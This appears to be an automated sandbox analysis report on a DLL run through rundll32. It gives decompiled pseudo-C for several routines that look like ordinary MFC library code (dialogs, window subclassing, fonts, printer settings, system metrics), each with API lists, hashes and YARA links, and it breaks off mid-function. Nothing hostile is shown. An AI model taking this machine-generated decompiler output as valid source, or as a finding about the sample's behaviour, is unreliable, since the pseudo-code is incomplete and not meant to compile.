Instruction ID: c20c66116e7296d4a0afd5037f2dffc74684b1862cb446d2da729e570b87d5d5
Opcode Fuzzy Hash: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
Instruction Fuzzy Hash: 3611C076C04266EBFB10DFA9ACC45097BE5E74F2D8301423FEA05A2124D7720980CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB74, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CB74(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				struct HINSTANCE__* _t95;
				signed int _t96;
				void* _t97;
				signed int _t99;
				void* _t100;
				void* _t101;

				_t101 = __eflags;
				_push(0x24);
				E10017BF4(E10028029, __ebx, __edi, __esi);
				_t99 = __ecx;
				 *((intOrPtr*)(_t100 - 0x20)) = __ecx;
				 *(_t100 - 0x1c) =  *(__ecx + 0x60);
				 *(_t100 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000D5EC(__ebx, __edi, __ecx, _t101);
				_t95 =  *(_t54 + 0xc);
				_t84 = 0;
				_t102 =  *(_t99 + 0x58);
				if( *(_t99 + 0x58) != 0) {
					_t95 =  *(E1000D5EC(0, _t95, _t99, _t102) + 0xc);
					_t54 = LoadResource(_t95, FindResourceA(_t95,  *(_t99 + 0x58), 5));
					 *(_t100 - 0x18) = _t54;
				}
				if( *(_t100 - 0x18) != _t84) {
					_t54 = LockResource( *(_t100 - 0x18));
					 *(_t100 - 0x1c) = _t54;
				}
				if( *(_t100 - 0x1c) != _t84) {
					_t86 = _t99;
					 *(_t100 - 0x14) = E1000C6AC(_t84, _t99, __eflags);
					E1000FC04(_t84, _t95, __eflags);
					 *(_t100 - 0x28) =  *(_t100 - 0x28) & _t84;
					__eflags =  *(_t100 - 0x14) - _t84;
					 *(_t100 - 0x2c) = _t84;
					 *(_t100 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t100 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t100 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t100 - 0x14), 0);
								 *(_t100 - 0x2c) = 1;
								_t84 = E1000A7CE();
								__eflags = _t84;
								 *(_t100 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E100128F8(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E10012913(_t84, 0);
											 *(_t100 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
					E100115DC(_t95, __eflags, _t99);
					_t58 = E1000FB5C(_t84, _t86, _t100,  *(_t100 - 0x14));
					_push(_t95);
					_push(_t58);
					_push( *(_t100 - 0x1c));
					_t59 = L1000C984(_t84, _t99, _t95, _t99, __eflags);
					_t96 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t99 + 0x3c) & 0x00000010;
						if(( *(_t99 + 0x3c) & 0x00000010) != 0) {
							_t97 = 4;
							_t71 = E10012862(_t99);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t97 = 5;
							}
							E1000F6F2(_t99, _t97);
							_t96 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t99 + 0x20)) - _t96;
						if( *((intOrPtr*)(_t99 + 0x20)) != _t96) {
							E1001297A(_t99, _t96, _t96, _t96, _t96, _t96, 0x97);
						}
					}
					 *(_t100 - 4) =  *(_t100 - 4) | 0xffffffff;
					__eflags =  *(_t100 - 0x28) - _t96;
					if( *(_t100 - 0x28) != _t96) {
						E10012913(_t84, 1);
					}
					__eflags =  *(_t100 - 0x2c) - _t96;
					if( *(_t100 - 0x2c) != _t96) {
						EnableWindow( *(_t100 - 0x14), 1);
					}
					__eflags =  *(_t100 - 0x14) - _t96;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t99 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t100 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t99 + 0x60))();
					E1000C6E6(_t84, _t99, _t96, _t99, __eflags);
					__eflags =  *(_t99 + 0x58) - _t96;
					if( *(_t99 + 0x58) != _t96) {
						FreeResource( *(_t100 - 0x18));
					}
					_t63 =  *(_t99 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E10017C60(_t63);
				}
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1000CB7B
FindResourceA.KERNEL32(?,?,00000005), ref: 1000CBAE
LoadResource.KERNEL32(?,00000000), ref: 1000CBB6
LockResource.KERNEL32(?,00000024,100014EC,00000000,4959DB98), ref: 1000CBC7
GetDesktopWindow.USER32 ref: 1000CBFA
IsWindowEnabled.USER32(?), ref: 1000CC08
EnableWindow.USER32(?,00000000), ref: 1000CC17

Part of subcall function 100128F8: IsWindowEnabled.USER32(?), ref: 10012901

Part of subcall function 10012913: EnableWindow.USER32(?,4959DB98), ref: 10012920

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,4959DB98), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,4959DB98), ref: 1000CD28

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction ID: 8f78f448105f665873ac1cd7b5fa33a3343bcf420d8a1ae80c8a79bff85a7528
Opcode Fuzzy Hash: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction Fuzzy Hash: A251BF34A007098BFF11DFA5C999EAEBBF1EF44781F20002EE506A6195CB759E41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10011245, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10011245(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E10017BF4(E1002864B, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000FB5C(1, _t60, _t71,  *(_t71 + 0x14));
					E10011159(_t60, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E100111CF(1, _t66, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000E865(E1000FB5C(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E100100F3(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E10017C60( *(_t71 - 0x14));
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1001124C
GetPropA.USER32 ref: 1001125B
CallWindowProcA.USER32 ref: 100112B5

Part of subcall function 100100F3: GetWindowRect.USER32 ref: 1001011B
Part of subcall function 100100F3: GetWindow.USER32(?,00000004), ref: 10010138

SetWindowLongA.USER32(?,000000FC,?), ref: 100112DC
RemovePropA.USER32 ref: 100112E4
GlobalFindAtomA.KERNEL32 ref: 100112EB
GlobalDeleteAtom.KERNEL32 ref: 100112F2

Part of subcall function 1000E865: GetWindowRect.USER32 ref: 1000E871

CallWindowProcA.USER32 ref: 10011346

Strings

AfxOldWndProc423, xrefs: 10011254, 10011259, 100112E2, 100112EA

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction ID: 0d19250562dc5a9dad551a697ef26f9b08052b09a3581b526b6705a222a2b98b
Opcode Fuzzy Hash: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction Fuzzy Hash: 2D317F7680021ABBDF05DFA0CD89EFF7FB9FF05651F100118F611A6051DB359A61ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 100149BE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E100149BE(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10057a08; // 0x4959db98
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E100167D5(E1001486F(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 100149E4
GetStockObject.GDI32(0000000D), ref: 100149EC
GetObjectA.GDI32(00000000,0000003C,?), ref: 100149F9
GetDC.USER32(00000000), ref: 10014A08
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10014A1C
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10014A28
ReleaseDC.USER32 ref: 10014A34

Strings

System, xrefs: 100149DF, 10014A49

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction ID: a63e4a091ca1b7be2859df30e5517b7a4abcdff67d16382c886f5131b7cbdf71
Opcode Fuzzy Hash: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction Fuzzy Hash: 39118F71A40268EBEB10DBA1CC85FAE7BB8FF04781F420015FA02AA190DE709D46CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10009360, Relevance: 13.6, APIs: 9, Instructions: 105
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10009360(intOrPtr __ecx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				signed int _t38;
				long _t49;
				intOrPtr _t50;
				void* _t60;
				long _t76;
				void* _t84;
				void* _t85;

				_v32 = __ecx;
				if(_a4 == 8) {
					return E100090F0(_t60, _v32, _t84, _t85);
				}
				if(_a4 == 9) {
					_t38 =  *0x10058ece & 0x000000ff;
					if(_t38 != 0) {
						_v8 = SendMessageA( *(_v32 + 0x94), 0xe, 0, 0);
						_v12 = _v32 + 0x74;
						SendMessageA( *(_v12 + 0x20), 0xb1, _v8, _v8);
						if(0 == 0) {
							SendMessageA( *(_v12 + 0x20), 0xb7, 0, 0);
						}
						_t76 =  *0x10058f0c; // 0x1005aa2c
						_v16 = _t76;
						SendMessageA( *(_v32 + 0x94), 0xc2, 0, _v16);
						if(_v8 > 0x1000) {
							_t50 =  *0x10058f0c; // 0x1005aa2c
							_t21 = _t50 - 0xc; // 0x0
							_v20 =  *_t21;
							_v24 = _v32 + 0x74;
							SendMessageA( *(_v24 + 0x20), 0xb1, 0, _v20);
							if(0 == 0) {
								SendMessageA( *(_v24 + 0x20), 0xb7, 0, 0);
							}
							SendMessageA( *(_v32 + 0x94), 0xc2, 0, 0x100295fc);
						}
						_v28 = SendMessageA( *(_v32 + 0x94), 0xba, 0, 0);
						_t49 = SendMessageA( *(_v32 + 0x94), 0xb6, 0, _v28);
						 *0x10058ece = 0;
						return _t49;
					}
				}
				return _t38;
			}

APIs

SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 100093A5
SendMessageA.USER32(?,000000B1,?,?), ref: 100093CB
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 100093E5
SendMessageA.USER32(?,000000C2,00000000,?), ref: 10009409
SendMessageA.USER32(?,000000B1,00000000,?), ref: 1000943E
SendMessageA.USER32(00000000,000000B7,00000000,00000000), ref: 10009458
SendMessageA.USER32(?,000000C2,00000000,100295FC), ref: 10009474
SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 1000948D
SendMessageA.USER32(?,000000B6,00000000,?), ref: 100094AB

Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091CA
Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091E4

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction ID: 329eb70852e0cb7846d89551eaf01311ead5dc39bdcc3cc6f9670776eeec1b90
Opcode Fuzzy Hash: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction Fuzzy Hash: BE411974A40205AFEB04CBA4CD99FAEB7B5FB4C740F208159FA45AB3D5C775AA02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013C4D, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E10013C4D(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E10017BF4(E10028893, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E10013965(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x1002b1d8;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E10013A82( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100134F9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100134F9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E1000A0A7(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E100174D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E10017C60(_t36);
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 10013C54
EnterCriticalSection.KERNEL32(?,00000010,10013E18,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013C65
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013C83
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013CB7
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction ID: 361604de1dd3242a2b5db774f8c39e7d6c7c8771dcfb3c7945be7f3a81b5ec95
Opcode Fuzzy Hash: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction Fuzzy Hash: 3F317C74500616AFDB20DF65E886C5EBBB5FF04350B21C529F95AAB661CB30ED90CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000A6E3, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000A6E3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E10014056(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10014056( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 1000A700
lstrcmpA.KERNEL32(?,?), ref: 1000A70C
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1000A71E
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A73E
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A746
GlobalLock.KERNEL32 ref: 1000A750
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1000A75D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1000A775

Part of subcall function 10014056: GlobalFlags.KERNEL32(?), ref: 10014061
Part of subcall function 10014056: GlobalUnlock.KERNEL32(?,?,?,1000A4C2,?,00000004,1000146F), ref: 10014073
Part of subcall function 10014056: GlobalFree.KERNEL32 ref: 1001407E

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction ID: f32a97280aef975bd063cd01cc2dace1ac46c13f829f9411547ae7bffa227ebc
Opcode Fuzzy Hash: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction Fuzzy Hash: ED11A075500600BBEB22CBBADC89DAF7AFDFB89B807104519F60AD5021DB31DD91DB20

Uniqueness

Uniqueness Score: -1.00%

Function 10013854, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013854(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x1005aa30 = GetSystemMetrics(2) + 1;
				 *0x1005aa34 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x1001385f
0x10013865
0x1001386c
0x10013874
0x1001387e
0x1001388f
0x10013899
0x100138a1
0x100138ad

APIs

GetSystemMetrics.USER32 ref: 10013861
GetSystemMetrics.USER32 ref: 10013868
GetSystemMetrics.USER32 ref: 1001386F
GetSystemMetrics.USER32 ref: 10013879
GetDC.USER32(00000000), ref: 10013883
GetDeviceCaps.GDI32(00000000,00000058), ref: 10013894
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1001389C
ReleaseDC.USER32 ref: 100138A4

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction ID: d97b14313f3971f9b273ebf2d99ed84bfce9517748686708ee6192b13dda979b
Opcode Fuzzy Hash: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction Fuzzy Hash: CEF03071A40714AFFB20AF728CC9F677BA8EB81B51F11491AE6428B6D0D7B59806CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000BD98, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000BD98(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10057a08; // 0x4959db98
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E10017BC1(E10027F63, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
